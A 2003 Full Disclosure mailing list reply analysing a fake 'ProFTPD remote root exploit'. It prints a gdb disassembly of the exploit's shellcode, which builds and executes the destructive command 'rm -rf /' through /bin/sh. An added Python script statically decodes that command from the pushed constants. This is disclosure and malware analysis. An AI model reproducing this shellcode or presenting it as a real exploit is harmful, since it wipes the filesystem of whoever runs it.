Full Disclosure mailing list archives
Re: ProFTPD-1.2.9rc2 remote root exploit
From: Simon Kirby <sim () netnation com>
Date: Fri, 24 Oct 2003 08:27:58 -0700
On Fri, Oct 24, 2003 at 03:36:17PM +0200, Andreas Gietl wrote:
> On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
>
> this seems to delete sth on the local harddisk. anybody else seeing this effect?
(gdb) disassemble &sc
Dump of assembler code for function sc:
0x0804a1a0 <sc+0>: xor %eax,%eax
0x0804a1a2 <sc+2>: push %eax
0x0804a1a3 <sc+3>: push $0x582f2066
0x0804a1a8 <sc+8>: push $0x722d206d
0x0804a1ad <sc+13>: push $0x7258632d
0x0804a1b2 <sc+18>: push $0x41414141
0x0804a1b7 <sc+23>: push $0x41414141
0x0804a1bc <sc+28>: push $0x41414141
0x0804a1c1 <sc+33>: push $0x41414141
0x0804a1c6 <sc+38>: push $0x4368732f
0x0804a1cb <sc+43>: push $0x6e69622f
0x0804a1d0 <sc+48>: xor %eax,%eax
0x0804a1d2 <sc+50>: mov %al,0x7(%esp,1)
0x0804a1d6 <sc+54>: mov %al,0x1a(%esp,1)
0x0804a1da <sc+58>: mov %al,0x23(%esp,1)
0x0804a1de <sc+62>: mov %esp,0x8(%esp,1)
0x0804a1e2 <sc+66>: xor %ebx,%ebx
0x0804a1e4 <sc+68>: lea 0x18(%esp,1),%ebx
0x0804a1e8 <sc+72>: mov %ebx,0xc(%esp,1)
0x0804a1ec <sc+76>: xor %ebx,%ebx
0x0804a1ee <sc+78>: lea 0x1b(%esp,1),%ebx
0x0804a1f2 <sc+82>: mov %ebx,0x10(%esp,1)
0x0804a1f6 <sc+86>: mov %eax,0x14(%esp,1)
0x0804a1fa <sc+90>: xor %ebx,%ebx
0x0804a1fc <sc+92>: mov %esp,%ebx
0x0804a1fe <sc+94>: lea 0x8(%esp,1),%ecx
0x0804a202 <sc+98>: xor %edx,%edx
0x0804a204 <sc+100>: lea 0x14(%esp,1),%edx
0x0804a208 <sc+104>: mov $0xb,%al
0x0804a20a <sc+106>: int $0x80
0x0804a20c <sc+108>: xor %ebx,%ebx
0x0804a20e <sc+110>: xor %eax,%eax
0x0804a210 <sc+112>: inc %eax
0x0804a211 <sc+113>: int $0x80
0x0804a213 <sc+115>: add %al,(%eax)
End of assembler dump.

Demangles "rm -rf /" and execs it?

Simon-

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
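Added example, not part of the original post: a static decode of the stack image that the disassembly above builds, which answers the question without executing anything. The instruction list is transcribed from the dump with addresses dropped, and the function names are this example's own; `mov $0xb,%al` followed by `int $0x80` is `execve` on i386 Linux, so the recovered strings are its argv.

```python
import re
import struct

# Setup instructions transcribed from the gdb dump in the post (addresses dropped).
DUMP = (
    "xor %eax,%eax; push %eax; push $0x582f2066; push $0x722d206d; "
    "push $0x7258632d; push $0x41414141; push $0x41414141; push $0x41414141; "
    "push $0x41414141; push $0x4368732f; push $0x6e69622f; xor %eax,%eax; "
    "mov %al,0x7(%esp,1); mov %al,0x1a(%esp,1); mov %al,0x23(%esp,1); "
    "mov %esp,0x8(%esp,1); lea 0x18(%esp,1),%ebx; mov %ebx,0xc(%esp,1); "
    "lea 0x1b(%esp,1),%ebx; mov %ebx,0x10(%esp,1); mov %eax,0x14(%esp,1)"
)

PUSH_IMM = re.compile(r"push \$0x([0-9a-f]+)")
NUL_PATCH = re.compile(r"mov %al,0x([0-9a-f]+)\(%esp,1\)")
LEA_EBX = re.compile(r"lea 0x([0-9a-f]+)\(%esp,1\),%ebx")

def stack_image(dump):
    """Return (bytes from %esp upward, argv string offsets) after the setup code."""
    words, patches, ptrs = [], [], []
    for ins in (i.strip() for i in dump.split(";")):
        if m := PUSH_IMM.fullmatch(ins):
            words.append(int(m.group(1), 16))
        elif ins == "push %eax":              # %eax was zeroed by the xor before it
            words.append(0)
        elif m := NUL_PATCH.fullmatch(ins):   # %al is 0: overwrites a filler byte with NUL
            patches.append(int(m.group(1), 16))
        elif ins == "mov %esp,0x8(%esp,1)":   # argv[0] points at offset 0
            ptrs.append(0)
        elif m := LEA_EBX.fullmatch(ins):     # address later stored into the argv array
            ptrs.append(int(m.group(1), 16))
    # The last dword pushed sits at the lowest address; x86 stores it little-endian.
    img = bytearray(b"".join(struct.pack("<I", w) for w in reversed(words)))
    for off in patches:
        img[off] = 0
    # The pointer stores at 0x8..0x17 only overwrite the 0x41 filler, so the
    # strings can be read without modelling them.
    return bytes(img), ptrs

def cstring(img, off):
    """Read the NUL-terminated ASCII string starting at off."""
    return img[off:img.index(0, off)].decode("ascii")

def decoded_argv(dump=DUMP):
    img, ptrs = stack_image(dump)
    return [cstring(img, p) for p in ptrs]

if __name__ == "__main__":
    print(decoded_argv())
```

The 'C' and 'X' bytes in the pushed constants are placeholders that the three `mov %al` instructions turn into string terminators, which is why the command is not visible as one contiguous string in the binary.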